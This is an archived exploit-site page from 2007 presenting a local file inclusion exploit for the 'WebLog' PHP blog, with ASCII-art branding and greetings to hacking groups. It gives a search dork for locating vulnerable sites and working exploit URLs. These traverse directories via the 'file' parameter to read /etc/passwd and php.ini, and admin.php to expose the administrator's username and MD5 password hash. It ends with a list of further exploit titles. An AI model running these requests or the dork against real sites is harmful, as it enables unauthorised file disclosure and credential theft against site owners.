exploits , vulnerabilities , articles , WebLog (index.php file) Remote File Disclosure Vulnerability

2006-03-28 GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)
2006-03-28 GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)

2007-03-15

WebLog (index.php file) Remote File Disclosure Vulnerability

Rated as : Moderate Risk

                                                         
.-""""""""-.                       
         
                                                         /   Dj7xpl   \   
                          
                                                        |              |  
                             
                                                        |,  .-.  .-.  ,|  
                             
                                                        | )(_o/  \o_)( |  
                                  
                                                        |/     /\     \|  
                              
                                              (@_       (_     ^^     _)  
               
                                         _     )
\_______\__|IIIIII|__/_______________________________
                                       
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In
World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :  
http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
#
#
#   Exploit :  
http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :  
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
#              
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
#              
http://localhost/blog/index.php?show=showarticles&file=../admin.php  
<<< username&password(md5)        
#    
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir,
Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

securitydot.net - 2007-03-15

Exploits - newest 10 RSS | More

2007-06-15 38444 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23885 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit